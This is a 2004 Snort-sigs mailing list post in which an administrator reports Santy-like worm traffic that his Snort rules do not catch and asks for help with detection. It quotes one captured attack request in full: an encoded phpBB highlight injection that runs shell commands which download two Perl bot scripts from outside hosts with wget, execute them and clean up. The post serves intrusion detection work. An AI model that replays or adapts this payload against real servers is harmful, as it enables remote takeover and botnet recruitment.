[Snort-sigs] Santy (sort of ) doesnt trigger any rule

Guy Marcenac guy.marc at ...2146...
Thu Dec 30 02:44:03 EST 2004


Helo,

I got an increasing number of attacks looking like santy. But they never 
trigger any of the rules I use (official snort set 2.2 and bleeding 
snort set, updated every night).

There are seven different patterns (the most frequent is attached 
below). The attacks come from lots of différent ip, which seem to have a 
webserver running.
They try to use an existing webalizer html page (wich itself contains 
références to à viewtopic.php file). Off course, it fails.

I'm not sure if this could really hurt if used with a real php page, but 
I think so.

I can post a complete sample of these atacks if needed.

GET 
/webalizer/usage_200407.html&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20killall%20-9%20perl;cd%20/tmp;mkdir%20.temp22;cd%20.temp22;wget%20http://www.abcft.org/themes/bot.htm;wget%20http://http://weblicious.com/.notes/ssh2.htm;perl%20ssh2.htm;rm%20ssh.htm;perl%20bot.htm;rm%20bot.htm%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527';

-- 
guy




More information about the Snort-sigs mailing list